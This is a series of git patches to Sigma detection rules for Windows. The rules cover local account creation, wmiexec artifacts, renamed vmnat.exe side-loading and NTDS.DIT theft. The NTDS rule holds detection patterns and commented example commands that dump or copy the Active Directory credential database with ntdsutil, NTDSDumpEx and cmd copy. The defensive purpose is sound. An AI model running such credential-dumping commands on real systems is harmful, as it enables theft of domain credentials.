'\net1.exe' - CommandLine|contains|all: - - ' user ' - - '/add' - condition: selection -falsepositives: - - Legitimate use of net.exe utility by legitimate users and admins to add local user -level: low From 9ed14ce5718ba09ee83c4187b12bfa2f92588c46 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 10 Sep 2022 09:34:16 +0200 Subject: [PATCH 63/73] tightened the regular expression --- .../file_event/file_event_win_wmiexec_default_filename.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_event/file_event_win_wmiexec_default_filename.yml b/rules/windows/file_event/file_event_win_wmiexec_default_filename.yml index e65d0b42c..daa4a4a85 100644 --- a/rules/windows/file_event/file_event_win_wmiexec_default_filename.yml +++ b/rules/windows/file_event/file_event_win_wmiexec_default_filename.yml @@ -14,7 +14,7 @@ logsource: product: windows detection: selection: - TargetFilename|re: '__\d{10}\.\d{1,7}' + TargetFilename|re: '\\Windows\\__1\d{9}\.\d{1,7}$' condition: selection falsepositives: - Unlikely From a616647b0886c7a4b68ace90e35650c1a64e1f24 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 10 Sep 2022 09:48:50 +0200 Subject: [PATCH 64/73] lowered score of scheduled task + SYSTEM rule --- .../proc_creation_win_susp_schtasks_schedule_type_system.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml index b2fc3c9a1..22eb46376 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml @@ -34,4 +34,4 @@ detection: condition: all of selection_* falsepositives: - Some installers were seen using this method of creation unfortunately. Filter them in your environment -level: high +level: medium From a053be791c30eff760c8ce50285f8a24506905bc Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 10 Sep 2022 09:49:14 +0200 Subject: [PATCH 65/73] Update proc_creation_win_user_discovery_get_aduser.yml --- .../proc_creation_win_user_discovery_get_aduser.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml b/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml index 6e5505cdf..663102824 100644 --- a/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml +++ b/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml @@ -24,7 +24,7 @@ detection: condition: all of selection_* falsepositives: - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often -level: high +level: medium tags: - attack.discovery - attack.t1033 From c98997390bc3fb8686968591d40cea6154d52e81 Mon Sep 17 00:00:00 2001 From: David ANDRE Date: Sun, 11 Sep 2022 12:35:05 +0200 Subject: [PATCH 66/73] Changes following advice --- .../image_load_vmware_nondefault_path.yml | 28 +++++++++++++++++++ .../proc_creation_win_renamed_vmnat.yml | 13 +++++---- 2 files changed, 36 insertions(+), 5 deletions(-) create mode 100644 rules/windows/image_load/image_load_vmware_nondefault_path.yml diff --git a/rules/windows/image_load/image_load_vmware_nondefault_path.yml b/rules/windows/image_load/image_load_vmware_nondefault_path.yml new file mode 100644 index 000000000..07386cf30 --- /dev/null +++ b/rules/windows/image_load/image_load_vmware_nondefault_path.yml @@ -0,0 +1,28 @@ +title: Renamed or Portable Vmnat.exe +id: 7c92840f-3d4e-4cd7-ae44-e321e9281ab1 +status: experimental +description: Detects renamed vmnat.exe or portable version that can be use for DLL side-loading +author: elhoim +date: 2022/09/09 +references: + - https://twitter.com/malmoeb/status/1525901219247845376 +tags: + - attack.defense_evasion + - attack.t1574.002 +logsource: + category: image_load + product: windows +detection: + selection: + Product: 'Vmware Workstation' + filter_rename: + Image|endswith: 'vmnat.exe' + filter_portable: + Image: + - 'C:\Program Files (x86)\VMware\VMware Workstation\vmnat.exe' + - 'C:\Windows\SysWOW64\vmnat.exe' + # TODO check @work if need to add System32 too (and/pr others) + condition: selection and not 1 of filter_* +falsepositives: + - VMware workstation installed in another path +level: critical diff --git a/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml b/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml index d7f2d8be8..f1721243d 100644 --- a/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml +++ b/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml @@ -1,7 +1,7 @@ -title: Proc Creation Win Renamed Vmnat.exe +title: Renamed or Portable Vmnat.exe id: 7b4f794b-590a-4ad4-ba18-7964a2832205 status: experimental -description: Detects renamed vmnat.exe (Legitimate file from VMware workstation) for DLL side-loading +description: Detects renamed vmnat.exe or portable version that can be used for DLL side-loading author: elhoim date: 2022/09/09 references: @@ -15,9 +15,12 @@ logsource: detection: selection: OriginalFileName: 'vmnat.exe' - filter: + filter_rename: Image|endswith: 'vmnat.exe' - condition: selection and not filter -falsepositives: + filter_portable: + Image: + - 'C:\Program Files (x86)\VMware\VMware Workstation\vmnat.exe' + - 'C:\Windows\SysWOW64\vmnat.exe' + condition: selection and not 1 of filter_* - Unknown level: high From 5b0c8f60e28bb5d99ee0e5a3339b51e6e4a7e57c Mon Sep 17 00:00:00 2001 From: David ANDRE Date: Sun, 11 Sep 2022 12:36:44 +0200 Subject: [PATCH 67/73] Removed trailing space --- .../process_creation/proc_creation_win_renamed_vmnat.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml b/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml index f1721243d..000b99070 100644 --- a/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml +++ b/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml @@ -18,7 +18,7 @@ detection: filter_rename: Image|endswith: 'vmnat.exe' filter_portable: - Image: + Image: - 'C:\Program Files (x86)\VMware\VMware Workstation\vmnat.exe' - 'C:\Windows\SysWOW64\vmnat.exe' condition: selection and not 1 of filter_* From d73aac41d36f7f42db94afb92f76854b5824ab94 Mon Sep 17 00:00:00 2001 From: David ANDRE Date: Sun, 11 Sep 2022 12:44:54 +0200 Subject: [PATCH 68/73] Changes based on advice --- .../proc_creation_win_renamed_vmnat.yml | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml b/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml index d7f2d8be8..000b99070 100644 --- a/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml +++ b/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml @@ -1,7 +1,7 @@ -title: Proc Creation Win Renamed Vmnat.exe +title: Renamed or Portable Vmnat.exe id: 7b4f794b-590a-4ad4-ba18-7964a2832205 status: experimental -description: Detects renamed vmnat.exe (Legitimate file from VMware workstation) for DLL side-loading +description: Detects renamed vmnat.exe or portable version that can be used for DLL side-loading author: elhoim date: 2022/09/09 references: @@ -15,9 +15,12 @@ logsource: detection: selection: OriginalFileName: 'vmnat.exe' - filter: + filter_rename: Image|endswith: 'vmnat.exe' - condition: selection and not filter -falsepositives: + filter_portable: + Image: + - 'C:\Program Files (x86)\VMware\VMware Workstation\vmnat.exe' + - 'C:\Windows\SysWOW64\vmnat.exe' + condition: selection and not 1 of filter_* - Unknown level: high From 262f0463519e096d2a2f8864c4a63d5fce739cd4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?David=20Andr=C3=A9?= Date: Sun, 11 Sep 2022 13:07:23 +0200 Subject: [PATCH 69/73] Delete image_load_vmware_nondefault_path.yml File added in wrong branch --- .../image_load_vmware_nondefault_path.yml | 28 ------------------- 1 file changed, 28 deletions(-) delete mode 100644 rules/windows/image_load/image_load_vmware_nondefault_path.yml diff --git a/rules/windows/image_load/image_load_vmware_nondefault_path.yml b/rules/windows/image_load/image_load_vmware_nondefault_path.yml deleted file mode 100644 index 07386cf30..000000000 --- a/rules/windows/image_load/image_load_vmware_nondefault_path.yml +++ /dev/null @@ -1,28 +0,0 @@ -title: Renamed or Portable Vmnat.exe -id: 7c92840f-3d4e-4cd7-ae44-e321e9281ab1 -status: experimental -description: Detects renamed vmnat.exe or portable version that can be use for DLL side-loading -author: elhoim -date: 2022/09/09 -references: - - https://twitter.com/malmoeb/status/1525901219247845376 -tags: - - attack.defense_evasion - - attack.t1574.002 -logsource: - category: image_load - product: windows -detection: - selection: - Product: 'Vmware Workstation' - filter_rename: - Image|endswith: 'vmnat.exe' - filter_portable: - Image: - - 'C:\Program Files (x86)\VMware\VMware Workstation\vmnat.exe' - - 'C:\Windows\SysWOW64\vmnat.exe' - # TODO check @work if need to add System32 too (and/pr others) - condition: selection and not 1 of filter_* -falsepositives: - - VMware workstation installed in another path -level: critical From 93da67b593c5692906a4152fabec835c9cb320f0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?David=20Andr=C3=A9?= Date: Sun, 11 Sep 2022 13:13:58 +0200 Subject: [PATCH 70/73] Update proc_creation_win_renamed_vmnat.yml Added accidentaly removed falsepositives --- .../windows/process_creation/proc_creation_win_renamed_vmnat.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml b/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml index 000b99070..9e1c9e924 100644 --- a/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml +++ b/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml @@ -22,5 +22,6 @@ detection: - 'C:\Program Files (x86)\VMware\VMware Workstation\vmnat.exe' - 'C:\Windows\SysWOW64\vmnat.exe' condition: selection and not 1 of filter_* +falsepositives: - Unknown level: high From 1eaad811b66d9beed129f194d576ea536c4faad5 Mon Sep 17 00:00:00 2001 From: Qasim Qlf Date: Mon, 12 Sep 2022 14:15:48 +0500 Subject: [PATCH 71/73] tag added --- .../windows/process_creation/proc_creation_win_apt_mercury.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/rules/windows/process_creation/proc_creation_win_apt_mercury.yml b/rules/windows/process_creation/proc_creation_win_apt_mercury.yml index 0aeb0543b..0cb982d1b 100644 --- a/rules/windows/process_creation/proc_creation_win_apt_mercury.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_mercury.yml @@ -6,10 +6,12 @@ references: - https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/ author: Florian Roth date: 2022/08/26 +modified: 2022/09/12 logsource: category: process_creation product: windows tags: + - attack.execution - attack.t1059.001 - attack.g0069 detection: From 0bbb679e38cdf553db2829d06cb859fe9b6ce2be Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 12 Sep 2022 13:29:51 +0200 Subject: [PATCH 72/73] fix: FPs with veam backup shell --- .../proc_creation_win_ntfs_short_name_path_use_cli.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml index 76b3888e5..6fe080f91 100644 --- a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml +++ b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml @@ -11,7 +11,7 @@ references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN - https://twitter.com/frack113/status/1555830623633375232 date: 2022/08/07 -modified: 2022/08/12 +modified: 2022/09/12 logsource: category: process_creation product: windows @@ -27,6 +27,7 @@ detection: - ParentImage|endswith: - '\WebEx\WebexHost.exe' - '\thor\thor64.exe' + - '\veam.backup.shell.exe' condition: selection and not filter falsepositives: - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. From 5f164ebe1279ce9b38941dc67fb68b686d172e46 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 12 Sep 2022 13:30:14 +0200 Subject: [PATCH 73/73] style: indentation --- .../proc_creation_win_susp_ntds.yml | 108 +++++++++--------- 1 file changed, 54 insertions(+), 54 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_susp_ntds.yml b/rules/windows/process_creation/proc_creation_win_susp_ntds.yml index 42b539ce4..0775c1450 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_ntds.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_ntds.yml @@ -4,63 +4,63 @@ description: Detects suspicious process patterns used in NTDS.DIT exfiltration status: experimental author: Florian Roth references: - - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration - - https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/ - - https://pentestlab.blog/tag/ntds-dit/ - - https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1 - - https://github.com/zcgonvh/NTDSDumpEx - - https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1 - - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1 + - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration + - https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/ + - https://pentestlab.blog/tag/ntds-dit/ + - https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1 + - https://github.com/zcgonvh/NTDSDumpEx + - https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1 + - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1 date: 2022/03/11 tags: - - attack.credential_access - - attack.t1003.003 + - attack.credential_access + - attack.t1003.003 logsource: - product: windows - category: process_creation + product: windows + category: process_creation detection: - selection_tool: - # https://github.com/zcgonvh/NTDSDumpEx - - Image|endswith: - - '\NTDSDump.exe' - - '\NTDSDumpEx.exe' - - CommandLine|contains|all: - # ntdsdumpex.exe -d ntds.dit -o hash.txt -s system.hiv - - 'ntds.dit' - - 'system.hiv' - - CommandLine|contains: 'NTDSgrab.ps1' - selection_oneliner_1: - # powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q" - CommandLine|contains|all: - - 'ac i ntds' - - 'create full' - selection_onliner_2: - # cmd.exe /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit - CommandLine|contains|all: - - '/c copy ' - - '\windows\ntds\ntds.dit' - selection_powershell: - CommandLine|contains|all: - - 'powershell' - - 'ntds.dit' - set1_selection_ntds_dit: - CommandLine|contains: 'ntds.dit' - set1_selection_image_folder: - - ParentImage|contains: - - '\apache' - - '\tomcat' - - '\AppData\' - - '\Temp\' - - '\Public\' - - '\PerfLogs\' - - Image|contains: - - '\apache' - - '\tomcat' - - '\AppData\' - - '\Temp\' - - '\Public\' - - '\PerfLogs\' - condition: 1 of selection* or all of set1* + selection_tool: + # https://github.com/zcgonvh/NTDSDumpEx + - Image|endswith: + - '\NTDSDump.exe' + - '\NTDSDumpEx.exe' + - CommandLine|contains|all: + # ntdsdumpex.exe -d ntds.dit -o hash.txt -s system.hiv + - 'ntds.dit' + - 'system.hiv' + - CommandLine|contains: 'NTDSgrab.ps1' + selection_oneliner_1: + # powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q" + CommandLine|contains|all: + - 'ac i ntds' + - 'create full' + selection_onliner_2: + # cmd.exe /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit + CommandLine|contains|all: + - '/c copy ' + - '\windows\ntds\ntds.dit' + selection_powershell: + CommandLine|contains|all: + - 'powershell' + - 'ntds.dit' + set1_selection_ntds_dit: + CommandLine|contains: 'ntds.dit' + set1_selection_image_folder: + - ParentImage|contains: + - '\apache' + - '\tomcat' + - '\AppData\' + - '\Temp\' + - '\Public\' + - '\PerfLogs\' + - Image|contains: + - '\apache' + - '\tomcat' + - '\AppData\' + - '\Temp\' + - '\Public\' + - '\PerfLogs\' + condition: 1 of selection* or all of set1* falsepositives: - - Unknown + - Unknown level: high